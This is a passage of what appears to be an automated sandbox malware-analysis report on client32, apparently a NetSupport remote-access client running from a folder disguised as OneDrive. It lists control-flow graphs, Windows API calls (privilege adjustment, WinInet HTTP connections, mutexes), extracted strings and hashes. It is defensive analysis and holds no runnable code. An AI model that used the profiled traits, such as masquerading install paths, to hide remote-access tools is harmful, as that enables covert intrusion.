calls 88526->88528 88527->88526 88529 1102eb35 OpenMutexA 88528->88529 88530 1102eb54 CreateMutexA 88529->88530 88531 1102ec5a CloseHandle 88529->88531 88532 1102eb76 88530->88532 88549 11084db0 88531->88549 88534 11102870 std::locale::facet::_Facet_Register 265 API calls 88532->88534 88536 1102eb8b 88534->88536 88535 1102ec70 88537 11150781 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 88535->88537 88538 1102ebae LoadLibraryA GetProcAddress 88536->88538 88539 1105c4b0 293 API calls 88536->88539 88541 1102f512 88537->88541 88542 1102ec05 88538->88542 88543 1102ec09 SetLastError 88538->88543 88539->88538 88558 110092f0 426 API calls std::locale::facet::_Facet_Register 88542->88558 88543->88542 88545 1102ec20 88546 1102ec30 WaitForSingleObject 88545->88546 88546->88546 88547 1102ec42 
CloseHandle 88546->88547 88547->88531 88548 1102ec53 FreeLibrary 88547->88548 88548->88531 88550 11084dea std::ios_base::_Tidy 88549->88550 88551 11084e57 88549->88551 88550->88551 88553 11084dfe CloseHandle 88550->88553 88552 11084e5e DeleteCriticalSection 88551->88552 88559 11138390 88552->88559 88553->88550 88555 11084e84 std::ios_base::_Tidy 88555->88535 88556->88518 88557->88521 88558->88545 88562 111383a4 88559->88562 88560 111383a8 88560->88555 88562->88560 88563 11137f50 67 API calls 2 library calls 88562->88563 88563->88562 88564 9d1020 GetCommandLineW 88566 9d1035 GetStartupInfoW 88564->88566 88567 9d1099 GetModuleHandleW 88566->88567 88568 9d1094 88566->88568 88571 9d1000 _NSMClient32 88567->88571 88568->88567 88570 9d10ab ExitProcess 88571->88570

Control-flow Graph

• Executed
• Not Executed
3 788->790 789->672 790->789
                                                        APIs
                                                          • Part of subcall function 11095790: GetCurrentProcess.KERNEL32(000F01FF,?,1102E62B,00000000,00000000,00080000,82E0FB89,00080000,00000000,00000000), ref: 110957BD
                                                          • Part of subcall function 11095790: OpenProcessToken.ADVAPI32(00000000), ref: 110957C4
                                                          • Part of subcall function 11095790: LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 110957D5
                                                          • Part of subcall function 11095790: AdjustTokenPrivileges.KERNELBASE(00000000), ref: 110957F9
                                                        • LocalAlloc.KERNEL32(00000040,00000014,SeSecurityPrivilege,?,00080000,82E0FB89,00080000,00000000,00000000), ref: 11096565
                                                        • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 1109657E
                                                        • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000), ref: 11096589
                                                        • GetVersionExA.KERNEL32(?), ref: 110965A0
                                                        • GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109660E
                                                        • SetSecurityDescriptorSacl.ADVAPI32(00000000,00000001,?,00000000), ref: 11096623
                                                        • FreeLibrary.KERNEL32(00000001,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 11096634
                                                        • CreateFileMappingA.KERNEL32(000000FF,1102E62B,00000004,00000000,?,?), ref: 11096670
                                                        • GetLastError.KERNEL32 ref: 1109667D
                                                        • LocalFree.KERNEL32(?), ref: 110966A6
                                                        • LocalFree.KERNEL32(?), ref: 110966B3
                                                        • GetLastError.KERNEL32 ref: 110966D0
                                                        • MapViewOfFile.KERNEL32(?,000F001F,00000000,00000000,00000000), ref: 110966EE
                                                        • LocalFree.KERNEL32(?), ref: 11096719
                                                        • LocalFree.KERNEL32(?), ref: 11096726
                                                          • Part of subcall function 11095700: LoadLibraryA.KERNEL32(Advapi32.dll,00000000,110965BE), ref: 11095708
                                                          • Part of subcall function 11095740: GetProcAddress.KERNEL32(00000000,ConvertStringSecurityDescriptorToSecurityDescriptorA), ref: 11095754
                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 11096752
                                                        • LocalFree.KERNEL32(?), ref: 1109681B
                                                        • LocalFree.KERNEL32(?), ref: 11096828
                                                        • _memset.LIBCMT ref: 11096840
                                                        • GetTickCount.KERNEL32 ref: 11096848
                                                        • GetCurrentProcessId.KERNEL32 ref: 110968F4
                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1109690F
                                                        • CreateEventA.KERNEL32(?,00000000,00000000,?,?,?,?,?,?), ref: 1109695B
                                                        • GetLastError.KERNEL32 ref: 11096964
                                                        • GetLastError.KERNEL32(00000000), ref: 1109696B
                                                        • CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 110969A0
                                                        • GetLastError.KERNEL32 ref: 110969A9
                                                        • GetLastError.KERNEL32(00000000), ref: 110969B0
                                                        • CreateEventA.KERNEL32(?,00000001,00000000,?), ref: 110969E6
                                                        • GetLastError.KERNEL32 ref: 110969EF
                                                        • GetLastError.KERNEL32(00000000), ref: 110969F6
                                                        • CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 11096A2B
                                                        • GetLastError.KERNEL32 ref: 11096A3A
                                                        • GetLastError.KERNEL32(00000000), ref: 11096A3D
                                                        • LocalFree.KERNEL32(?), ref: 11096A65
                                                        • LocalFree.KERNEL32(?), ref: 11096A72
                                                        • GetCurrentThreadId.KERNEL32 ref: 11096AA3
                                                        • CreateThread.KERNEL32(00000000,00002000,Function_00096070,00000000,00000000,00000030), ref: 11096ABD
                                                        • ResetEvent.KERNEL32(?), ref: 11096AEC
                                                        • ResetEvent.KERNEL32(?), ref: 11096AF2
                                                        • ResetEvent.KERNEL32(?), ref: 11096AF8
                                                        • SetEvent.KERNEL32(?), ref: 11096AFE
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorLast$FreeLocal$Event$Create$DescriptorFileSecurity$CurrentProcessReset$LibraryModuleNameSaclThreadToken$AddressAdjustAllocCountDaclInitializeLoadLookupMappingOpenPrivilegePrivilegesProcTickValueVersionView_memset
                                                        • String ID: Cant create event %s, e=%d (x%x)$Error cant create events$Error cant map view$Error creating filemap (%d)$Error filemap exists$IPC(%s) created$Info - reusing existing filemap$S:(ML;;NW;;;LW)$SeSecurityPrivilege$cant create events$cant create filemap$cant create thread$cant map$map exists$warning map exists
                                                        • API String ID: 3291243470-2792520954
                                                        • Opcode ID: f773c3081aeaebb21c1be5ebe8f63fcd40c310f00c8f4f33c420054a7f1d20a5
                                                        • Instruction ID: 81383098c44230803e0ca2a3017f0c468739c05f63c930fd52011b603addab5e
                                                        • Opcode Fuzzy Hash: f773c3081aeaebb21c1be5ebe8f63fcd40c310f00c8f4f33c420054a7f1d20a5
                                                        • Instruction Fuzzy Hash: 55127FB5E0021D9FDB24DF61CCD4EAEB7F9FB88304F0445A9E51A97240EA71A984CF61

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 795 110280f0-1102817e LoadLibraryA 796 11028181-11028186 795->796 797 11028188-1102818b 796->797 798 1102818d-11028190 796->798 799 110281a5-110281aa 797->799 800 11028192-11028195 798->800 801 11028197-110281a2 798->801 802 110281d9-110281e5 799->802 803 110281ac-110281b1 799->803 800->799 801->799 806 1102828a-1102828d 802->806 807 110281eb-11028203 call 111515d1 802->807 804 110281b3-110281ca GetProcAddress 803->804 805 110281cc-110281cf 803->805 804->805 808 110281d1-110281d3 SetLastError 804->808 805->802 810 110282a8-110282c0 InternetOpenA 806->810 811 1102828f-110282a6 GetProcAddress 806->811 817 11028224-11028230 807->817 818 11028205-1102821e GetProcAddress 807->818 808->802 813 110282e4-110282f0 call 11151665 810->813 811->810 812 110282d9-110282e1 SetLastError 811->812 812->813 823 110282f6-11028327 call 11131740 call 11152870 813->823 824 1102856a-11028574 813->824 822 11028232-1102823b GetLastError 817->822 825 11028251-11028253 817->825 818->817 820 110282c2-110282ca SetLastError 818->820 820->822 822->825 826 1102823d-1102824f call 11151665 call 111515d1 822->826 848 11028329-1102832c 823->848 849 1102832f-11028344 call 1107c3b0 * 2 823->849 824->796 828 1102857a 824->828 830 11028270-1102827c 825->830 831 11028255-1102826e GetProcAddress 825->831 826->825 833 1102858c-1102858f 828->833 830->806 852 1102827e-11028287 830->852 831->830 835 110282cf-110282d7 SetLastError 831->835 837 11028591-11028596 833->837 838 1102859b-1102859e 833->838 835->806 842 110286ff-11028707 837->842 843 110285a0-110285a5 838->843 844 110285aa 838->844 850 11028710-11028723 842->850 851 11028709-1102870a FreeLibrary 842->851 845 110286cf-110286d4 843->845 846 110285ad-110285b5 844->846 855 110286d6-110286ed GetProcAddress 845->855 856 110286ef-110286f5 845->856 853 110285b7-110285ce GetProcAddress 846->853 854 110285d4-110285dd 846->854 848->849 869 11028346-1102834a 849->869 870 1102834d-11028359 
849->870 851->850 852->806 853->854 858 1102868e-11028690 SetLastError 853->858 862 110285e0-110285e2 854->862 855->856 859 110286f7-110286f9 SetLastError 855->859 856->842 864 11028696-1102869d 858->864 859->842 862->864 866 110285e8-110285ed 862->866 867 110286ac-110286cd call 110265c0 * 2 864->867 866->867 871 110285f3-1102862f call 111028f0 call 11026570 866->871 867->845 869->870 873 11028384-11028389 870->873 874 1102835b-1102835d 870->874 896 11028641-11028643 871->896 897 11028631-11028634 871->897 880 1102838b-1102839c GetProcAddress 873->880 881 1102839e-110283b5 InternetConnectA 873->881 877 11028374-1102837a 874->877 878 1102835f-11028372 GetProcAddress 874->878 877->873 878->877 883 1102837c-1102837e SetLastError 878->883 880->881 885 110283e1-110283ec SetLastError 880->885 886 11028557-11028567 call 11150341 881->886 887 110283bb-110283be 881->887 883->873 885->886 886->824 891 110283c0-110283c2 887->891 892 110283f9-11028401 887->892 898 110283c4-110283d7 GetProcAddress 891->898 899 110283d9-110283df 891->899 894 11028403-11028417 GetProcAddress 892->894 895 11028419-11028434 892->895 894->895 903 11028436-1102843e SetLastError 894->903 909 11028441-11028444 895->909 900 11028645 896->900 901 1102864c-11028651 896->901 897->896 904 11028636-1102863a 897->904 898->899 902 110283f1-110283f3 SetLastError 898->902 899->892 900->901 905 11028653-11028669 call 110c6140 901->905 906 1102866c-1102866e 901->906 902->892 903->909 904->896 910 1102863c 904->910 905->906 912 11028670-11028672 906->912 913 11028674-11028685 call 11150341 906->913 914 11028552-11028555 909->914 915 1102844a-1102844f 909->915 910->896 912->913 918 1102869f-110286a9 call 11150341 912->918 913->867 928 11028687-11028689 913->928 914->886 917 1102857c-11028589 call 11150341 914->917 920 11028451-11028468 GetProcAddress 915->920 921 1102846a-11028476 915->921 917->833 918->867 920->921 925 11028478-11028480 SetLastError 920->925 927 11028482-1102849b GetLastError 921->927 925->927 931 
110284b6-110284cb 927->931 932 1102849d-110284b4 GetProcAddress 927->932 928->846 935 110284d5-110284e3 GetLastError 931->935 932->931 933 110284cd-110284cf SetLastError 932->933 933->935 936 110284e5-110284ea 935->936 937 110284ec-110284f8 GetDesktopWindow 935->937 936->937 938 11028542-11028547 936->938 939 11028513-1102852f 937->939 940 110284fa-11028511 GetProcAddress 937->940 938->914 941 11028549-1102854f 938->941 939->914 944 11028531 939->944 940->939 942 11028536-11028540 SetLastError 940->942 941->914 942->914 944->909
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(WinInet.dll,82E0FB89,771B23A0,?,00000000), ref: 11028125
                                                        • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 110281BF
                                                        • SetLastError.KERNEL32(00000078), ref: 110281D3
                                                        • _malloc.LIBCMT ref: 110281F7
                                                        • GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 11028211
                                                        • GetLastError.KERNEL32 ref: 11028232
                                                        • _free.LIBCMT ref: 1102823E
                                                        • _malloc.LIBCMT ref: 11028247
                                                        • GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 11028261
                                                        • GetProcAddress.KERNEL32(?,InternetOpenA), ref: 1102829B
                                                        • InternetOpenA.WININET(11182200,?,?,000000FF,00000000), ref: 110282BA
                                                        • SetLastError.KERNEL32(00000078), ref: 110282C4
                                                        • SetLastError.KERNEL32(00000078), ref: 110282D1
                                                        • SetLastError.KERNEL32(00000078), ref: 110282DB
                                                        • _free.LIBCMT ref: 110282E5
                                                          • Part of subcall function 11151665: HeapFree.KERNEL32(00000000,00000000,?,1115A186,00000000,?,111028FE,?,?,?,?,111343F2,?,?,?), ref: 1115167B
                                                          • Part of subcall function 11151665: GetLastError.KERNEL32(00000000,?,1115A186,00000000,?,111028FE,?,?,?,?,111343F2,?,?,?), ref: 1115168D
                                                        • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11028365
                                                        • SetLastError.KERNEL32(00000078), ref: 1102837E
                                                        • GetProcAddress.KERNEL32(?,InternetConnectA), ref: 11028391
                                                        • InternetConnectA.WININET(000000FF,11187458,00000050,00000000,00000000,00000003,00000000,00000000), ref: 110283AE
                                                        • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 110283CA
                                                        • SetLastError.KERNEL32(00000078), ref: 110283E3
                                                        • GetProcAddress.KERNEL32(?,HttpOpenRequestA), ref: 11028409
                                                        • GetProcAddress.KERNEL32(?,HttpSendRequestA), ref: 1102845D
                                                        • GetProcAddress.KERNEL32(?,InternetQueryDataAvailable), ref: 110285C3
                                                        • SetLastError.KERNEL32(00000078), ref: 11028690
                                                        • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 110286E2
                                                        • SetLastError.KERNEL32(00000078), ref: 110286F9
                                                        • FreeLibrary.KERNEL32(?), ref: 1102870A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AddressProc$ErrorLast$FreeInternetLibrary_free_malloc$ConnectHeapLoadOpen
                                                        • String ID: ://$GET$HttpOpenRequestA$HttpQueryInfoA$HttpSendRequestA$InternetCloseHandle$InternetConnectA$InternetErrorDlg$InternetOpenA$InternetQueryDataAvailable$InternetQueryOptionA$WinInet.dll
                                                        • API String ID: 921868004-913974648
                                                        • Opcode ID: 38a177254a395bd81f3ba5e7078fbe7383a886fa9f6ba65ffc089b6185ad6f7b
                                                        • Instruction ID: 1ba2d1776f027d8e66b5c2b51482412bc640081c7f076ce1c4d8da5fffc402e2
                                                        • Opcode Fuzzy Hash: 38a177254a395bd81f3ba5e7078fbe7383a886fa9f6ba65ffc089b6185ad6f7b
                                                        • Instruction Fuzzy Hash: AD1280B9D406299FDB12CFA5CC88A9EFBF4EF89304F64855AF416B7244DB705A40CB60

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 945 6c815690-6c8156b0 call 6c802a90 call 6c81c240 950 6c8156b2-6c8156f5 LoadLibraryA 945->950 951 6c8156f7 945->951 952 6c8156f9-6c815758 call 6c807640 InitializeCriticalSection CreateEventA 950->952 951->952 955 6c815771-6c81577e CreateEventA 952->955 956 6c81575a-6c81576e call 6c805910 952->956 957 6c815780-6c815794 call 6c805910 955->957 958 6c815797-6c8157a4 CreateEventA 955->958 956->955 957->958 961 6c8157a6-6c8157ba call 6c805910 958->961 962 6c8157bd-6c8157d0 WSAStartup 958->962 961->962 966 6c8157e3-6c81581c call 6c81f8cb 962->966 967 6c8157d2-6c8157e2 call 6c803d90 call 6c802b70 962->967 973 6c81583a-6c81585b call 6c81f9b0 call 6c818210 966->973 974 6c81581e-6c815837 call 6c805910 966->974 983 6c81585d-6c815862 973->983 984 6c81586e-6c815876 call 6c8041f0 973->984 974->973 985 6c815864-6c81586c 983->985 988 6c815910-6c815915 984->988 989 6c81587c-6c81589f call 6c81f8cb 984->989 985->984 985->985 990 6c815923-6c81593b call 6c804950 call 6c804020 988->990 991 6c815917-6c81591a 988->991 996 6c8158a1-6c8158c0 call 6c805910 989->996 997 6c8158c3-6c8158e1 call 6c81f9b0 call 6c81f8cb 989->997 998 6c81593e-6c815959 call 6c804950 990->998 991->990 993 6c81591c-6c815921 991->993 993->990 993->998 996->997 1016 6c8158e3-6c8158fc call 6c805910 997->1016 1017 6c8158ff-6c81590d call 6c81f9b0 997->1017 1009 6c815966-6c815990 GetTickCount CreateThread 998->1009 1010 6c81595b-6c815961 998->1010 1012 6c815992-6c8159ab call 6c805910 1009->1012 1013 6c8159ae-6c8159bb SetThreadPriority 1009->1013 1010->1009 1012->1013 1014 6c8159d4-6c815a00 call 6c8049e0 GetModuleFileNameA call 6c802420 1013->1014 1015 6c8159bd-6c8159d1 call 6c805910 1013->1015 1030 6c815a02-6c815a03 1014->1030 1031 6c815a05 1014->1031 1015->1014 1016->1017 1017->988 1032 6c815a0a-6c815a26 1030->1032 1031->1032 1033 6c815a30-6c815a3f 1032->1033 1033->1033 1034 6c815a41-6c815a46 1033->1034 1035 6c815a47-6c815a4d 1034->1035 1035->1035 
1036 6c815a4f-6c815a88 GetPrivateProfileIntA GetModuleHandleA 1035->1036 1037 6c815b23-6c815b47 CreateMutexA 1036->1037 1038 6c815a8e-6c815aba call 6c804950 * 2 1036->1038 1043 6c815af6-6c815b1d call 6c804950 * 2 1038->1043 1044 6c815abc-6c815ad1 call 6c804950 1038->1044 1043->1037 1050 6c815ad3-6c815ae8 call 6c804950 1044->1050 1051 6c815aea-6c815af0 1044->1051 1050->1043 1050->1051 1051->1043
                                                        APIs
                                                          • Part of subcall function 6C802A90: GetModuleFileNameA.KERNEL32(00000000,?,00000100), ref: 6C802ACB
                                                          • Part of subcall function 6C802A90: _strrchr.LIBCMT ref: 6C802ADA
                                                          • Part of subcall function 6C802A90: _strrchr.LIBCMT ref: 6C802AEA
                                                          • Part of subcall function 6C802A90: wsprintfA.USER32 ref: 6C802B05
                                                          • Part of subcall function 6C81C240: _malloc.LIBCMT ref: 6C81C259
                                                          • Part of subcall function 6C81C240: wsprintfA.USER32 ref: 6C81C274
                                                          • Part of subcall function 6C81C240: _memset.LIBCMT ref: 6C81C297
                                                        • LoadLibraryA.KERNEL32(WinInet.dll), ref: 6C8156B7
                                                        • InitializeCriticalSection.KERNEL32(6C849898), ref: 6C81573F
                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 6C81574F
                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 6C815775
                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 6C81579B
                                                        • WSAStartup.WSOCK32(00000101,6C84991A), ref: 6C8157C7
                                                        • _malloc.LIBCMT ref: 6C81580D
                                                          • Part of subcall function 6C81F8CB: __FF_MSGBANNER.LIBCMT ref: 6C81F8E4
                                                          • Part of subcall function 6C81F8CB: __NMSG_WRITE.LIBCMT ref: 6C81F8EB
                                                          • Part of subcall function 6C81F8CB: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,6C82B131,6C824BF1,00000001,6C824BF1,?,6C82D1B5,00000018,6C845558,0000000C,6C82D245), ref: 6C81F910
                                                        • _memset.LIBCMT ref: 6C81583D
                                                        • _malloc.LIBCMT ref: 6C815890
                                                        • _memset.LIBCMT ref: 6C8158C6
                                                        • _malloc.LIBCMT ref: 6C8158D2
                                                        • _memset.LIBCMT ref: 6C815908
                                                        • GetTickCount.KERNEL32 ref: 6C815966
                                                        • CreateThread.KERNEL32(00000000,00004000,6C8151C0,00000000,00000000,6C849ACC), ref: 6C815983
                                                        • SetThreadPriority.KERNEL32(00000000,00000001), ref: 6C8159B1
                                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\MSOneDrive\Support\,00000104), ref: 6C8159E9
                                                        • GetPrivateProfileIntA.KERNEL32(htctl.packet_tracing,mode,00000000,C:\Users\user\AppData\Local\MSOneDrive\Support\pci.ini), ref: 6C815A70
                                                        • GetModuleHandleA.KERNEL32(nsmtrace), ref: 6C815A80
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3755108701.000000006C801000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C800000, based on PE: true
                                                        • Associated: 0000000B.00000002.3755083319.000000006C800000.00000002.00000001.01000000.0000000C.sdmp
                                                        • Associated: 0000000B.00000002.3755148279.000000006C83E000.00000002.00000001.01000000.0000000C.sdmp
                                                        • Associated: 0000000B.00000002.3755174428.000000006C847000.00000008.00000001.01000000.0000000C.sdmp
                                                        • Associated: 0000000B.00000002.3755197287.000000006C848000.00000004.00000001.01000000.0000000C.sdmp
                                                        • Associated: 0000000B.00000002.3755197287.000000006C84C000.00000004.00000001.01000000.0000000C.sdmp
                                                        • Associated: 0000000B.00000002.3755242929.000000006C84F000.00000002.00000001.01000000.0000000C.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_6c800000_client32.jbxd
                                                        Similarity
                                                        • API ID: Create_malloc_memset$EventModule$FileNameThread_strrchrwsprintf$AllocCountCriticalHandleHeapInitializeLibraryLoadPriorityPrivateProfileSectionStartupTick
                                                        • String ID: (iflags & CTL_REMOTE) == 0$*CMPI$*DisconnectTimeout$494126$C:\Users\user\AppData\Local\MSOneDrive\Support\$C:\Users\user\AppData\Local\MSOneDrive\Support\pci.ini$General$HTCTL32$NSM896597$Support\$Trace$TraceFile$TraceRecv$TraceSend$WinInet.dll$_debug$e:\nsmsrc\nsn\300\cva_300f1\ctl32\htctl.c$htctl.packet_tracing$mode$nsmtrace$pci.ini$sv.ResumeEvent$sv.hRecvThread$sv.hRecvThreadReadyEvent$sv.hResponseEvent$sv.s$sv.subset.omit$sv.subset.subset
                                                        • API String ID: 2307927588-2221551840
                                                        • Opcode ID: 224b16f7efe33b63dd8a3428c66734efb69ce5eab33c82998ce6e72c1b02ba97
                                                        • Instruction ID: 31072543742ccb413c06cf495012aaf97e27ba3762d6a6d407434ae101f2cabc
                                                        • Opcode Fuzzy Hash: 224b16f7efe33b63dd8a3428c66734efb69ce5eab33c82998ce6e72c1b02ba97
                                                        • Instruction Fuzzy Hash: 0FC1A4B1A44319AFE730AF69AF859577BF8A71530CB148D39E44997F02D730A844CBE1
                                                        APIs
                                                        • GetSystemMetrics.USER32(0000004C), ref: 1110E422
                                                        • SystemParametersInfoA.USER32(00000025,00000000,00000000,00000000), ref: 1110E438
                                                        • SystemParametersInfoA.USER32(00000026,00000000,03060800,00000000), ref: 1110E44A
                                                        • SystemParametersInfoA.USER32(00000049,00000008,00000008,00000000), ref: 1110E4A0
                                                        • SystemParametersInfoA.USER32(00000048,00000008,00000008,00000000), ref: 1110E4B5
                                                        • SystemParametersInfoA.USER32(00001002,00000000,03060810,00000000), ref: 1110E519
                                                        • SystemParametersInfoA.USER32(00001005,00000000,00000000,00000000), ref: 1110E55F
                                                        • SystemParametersInfoA.USER32(00001004,00000000,03060808,00000000), ref: 1110E577
                                                        • SystemParametersInfoA.USER32(00001007,00000000,00000000,00000000), ref: 1110E5BD
                                                        • SystemParametersInfoA.USER32(00001006,00000000,0306080C,00000000), ref: 1110E5D5
                                                        • SystemParametersInfoA.USER32(0000101B,00000000,00000000,00000000), ref: 1110E61B
                                                        • SystemParametersInfoA.USER32(0000101A,00000000,03060814,00000000), ref: 1110E633
                                                        • SystemParametersInfoA.USER32(00001015,00000000,00000000,00000000), ref: 1110E679
                                                        • SystemParametersInfoA.USER32(00001014,00000000,03060818,00000000), ref: 1110E691
                                                        • SystemParametersInfoA.USER32(00001017,00000000,00000000,00000000), ref: 1110E6D7
                                                        • SystemParametersInfoA.USER32(00001016,00000000,0306081C,00000000), ref: 1110E6EF
                                                        • SystemParametersInfoA.USER32(00001025,00000000,00000000,00000000), ref: 1110E735
                                                        • SystemParametersInfoA.USER32(00001024,00000000,03060820,00000000), ref: 1110E74D
                                                        • SystemParametersInfoA.USER32(00001009,00000000,00000000,00000000), ref: 1110E7FF
                                                        • SystemParametersInfoA.USER32(00001008,00000000,03060828,00000000), ref: 1110E817
                                                        • SystemParametersInfoA.USER32(0000004B,00000000,00000000,00000000), ref: 1110E85A
                                                        • SystemParametersInfoA.USER32(0000004A,00000000,0306082C,00000000), ref: 1110E86F
                                                        • SystemParametersInfoA.USER32(00001003,00000000,00000000,00000000), ref: 1110E501
                                                          • Part of subcall function 11059580: __wcstoi64.LIBCMT ref: 110595BD
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Similarity
                                                        • API ID: System$InfoParameters$Metrics__wcstoi64
                                                        • String ID: EnableAnimation$EnableCBAnimation$EnableDragFullWindows$EnableDropShadow$EnableFontSmoothing$EnableGradientCaptions$EnableIESmoothScroll$EnableLBSmoothScroll$EnableLVAlphaSelect$EnableLVShadow$EnableLVWatermark$EnableMenuAnimation$EnableSelectionFade$EnableShadowCursor$EnableTBAnimations$EnableTTAnimation$EnableTVSmoothScroll$ListviewAlphaSelect$ListviewShadow$ListviewWatermark$SmoothScroll$TaskbarAnimations
                                                        • API String ID: 3799663137-3751266815
                                                        • Opcode ID: e7a4dce61e0f6dc888a7ab4a6d4f103cf71d0abfd572eaa5a0d6346dd09f0406
                                                        • Instruction ID: 9f95c093d5af311da67ec9eb410866abb6d77f64e7d878690f97347aefdc1e61
                                                        • Opcode Fuzzy Hash: e7a4dce61e0f6dc888a7ab4a6d4f103cf71d0abfd572eaa5a0d6346dd09f0406
                                                        • Instruction Fuzzy Hash: 0D12C434A02B56BAF7208B67CE44FABFBA5ABC4B44F51441CF546AA1C0EBB4F580C754
                                                        APIs
                                                          • Part of subcall function 11134260: GetLastError.KERNEL32(?,00000000,75A3795C,00000000), ref: 11134295
                                                          • Part of subcall function 11134260: Sleep.KERNEL32(000000C8,?,?,?,?,?,?,00000000,75A3795C,00000000), ref: 111342A5
                                                        • _fgets.LIBCMT ref: 1105D682
                                                        • _strpbrk.LIBCMT ref: 1105D6E9
                                                        • _fgets.LIBCMT ref: 1105D7EC
                                                        • _strpbrk.LIBCMT ref: 1105D863
                                                        • __wcstoui64.LIBCMT ref: 1105D87C
                                                        • _fgets.LIBCMT ref: 1105D8F5
                                                        • _strpbrk.LIBCMT ref: 1105D91B
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Similarity
                                                        • API ID: _fgets_strpbrk$ErrorLastSleep__wcstoui64
                                                        • String ID: %c%04d%s$%s.%04d.%s$/- $?expirY$?starT$ACM$Client$Expired$_License$_checksum$_include$_version$cd_install$defaults$enforce$expiry$inactive$licensee$product$shrink_wrap$start
                                                        • API String ID: 716802716-1571441106
                                                        • Opcode ID: f5eea2a609ae30e24c7521b51ab016292f72383e495257dbf3964fe323c1f7db
                                                        • Instruction ID: 4e0492978d8d4243d04b01263315b5fbbceebc438647a9249f86b1f3f6260675
                                                        • Opcode Fuzzy Hash: f5eea2a609ae30e24c7521b51ab016292f72383e495257dbf3964fe323c1f7db
